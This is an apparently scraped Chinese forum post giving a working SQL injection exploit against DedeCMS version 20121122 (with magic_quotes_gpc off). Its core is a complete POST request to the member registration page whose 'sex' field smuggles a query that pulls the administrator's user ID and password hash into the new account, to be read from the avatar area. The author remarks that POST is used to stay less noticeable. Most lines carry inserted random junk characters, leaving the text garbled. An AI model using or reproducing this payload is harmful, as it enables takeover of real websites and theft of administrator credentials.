dedecms版本 20121122
" ?8 ]1 k' T- C( J! f, I
! Z Y) s. _; S& ?需要magic_quotes_gpc=Off; [+ a0 M% {$ B7 N% {
1 h/ g+ r+ i5 |* i& E
应该是没有什么大危害的漏洞., D4 s( R! I3 u! S1 i! [
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
& } E) D6 n% X5 |( m; w+ r) R3 a/ Q
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
% J/ ^* N1 {- \POST提交以下数据,其实不用POST提交的,这样隐蔽点.
; g) s+ \% }; G6 L* }9 h. M9 t( a; ?8 E% N- ^* Q% r* o. N; l( Y8 d
http:///de/member/reg_new.php9 o( m( N7 @' G# _: b# T
5 r8 T$ a% D6 VPOST2 X2 ^0 V' g! k6 o4 p4 k. q
6 a( L+ O" C4 r1 k( I' L( Ddopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=6 f4 P% n' e; G9 U7 b, N/ N
8 p2 y" v$ a/ p: e. i4 Y
成功注册后,头像处里面有好玩的信息.
1 t+ m$ R% I2 G' {4 y$ j) d
; ~: G4 n3 K) |8 ?; _7 A7 G' @$ e |